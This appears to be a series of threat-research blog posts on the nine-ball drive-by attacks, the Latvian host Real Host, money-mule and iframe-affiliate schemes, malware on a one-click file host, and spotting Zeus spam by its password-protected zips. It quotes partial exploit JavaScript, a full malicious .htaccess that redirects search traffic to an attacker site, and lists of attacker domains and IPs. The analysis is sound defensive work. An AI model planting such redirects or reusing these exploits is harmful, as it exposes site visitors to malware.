Andrew Martin

A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 | Part 2)

The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
var shellcode=unescape(”%uC033….

obj.data=’./directshow.php’;
obj.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
try
{
var objspread=new ActiveXObject(’OWC10.Spreadsheet’);
}

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host are first uncovered. Delving deeper into this provider  it is apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

• Exploits including unpatched (or soon to be patched) 0days
• Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
• Phishing sites
• Moneymule recruitment sites
• Botnet Command and Control servers
• Hosting of cybercrime websites – Iframe programs
• Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206), these are:

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

A little manual investigation led me to the following:

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site

Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more that 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.

As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla.

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker’s site, ake.kz

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.

Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I’ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic . I’ve included virus total results, domains involved, etc at the end of the post.

Sit back, relax and enjoy the ride.

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acroat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit

It’s been awhile since I posted unfortunately, but it’s not due to a lack of attacks to talk about! Some time ago I was approached by the Host Exploit open source security research group and they asked me if I would help contribute to their efforts. This is the group that put together research that led to the McColo, Atrivo and EST domains take downs. Since I’m always trying to get the word out on attacks and threats, the answer was quite obvious.

So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it’s going to be very juicy

While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has a listing of many of them. These providers allow you to share files via HTTP for free or a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24×01.hpg.ig.com.br/ree1.html
hxxp://gay24×01.hpg.ig.com.br/ree2.html
hxxp://gay24×02.hpg.ig.com.br/nl2.html
hxxp://gay24×02.hpg.ig.com.br/nl3.html
hxxp://gay24×02.hpg.ig.com.br/nl4.html
hxxp://gay24×02.hpg.ig.com.br/nl5.html
hxxp://gay24×02.hpg.ig.com.br/nl6.html
hxxp://gay24×02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.

In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.

Another method I’d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was “djellow.zip”.  A quick search leads us to this article over at abuse.ch.

The messages were sent from a number of IPs, including:

95.25.108.154
95.24.3.119
89.248.207.69
88.227.199.86
86.105.126.142
85.100.177.112
84.92.85.139
84.204.112.15
84.104.97.35
83.5.144.32
78.176.8.64
78.166.216.115
78.161.81.160
78.158.51.103
77.77.15.208
77.255.254.214
76.175.144.40
72.179.5.10
71.124.158.42
209.239.38.24
201.22.7.148
201.15.77.229
201.0.136.67
200.68.63.226
200.56.79.179
190.175.133.38
189.78.200.43
188.47.4.252
187.14.9.68

The two worst offenders are Brazil and Turkey with 5 IPs each.

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.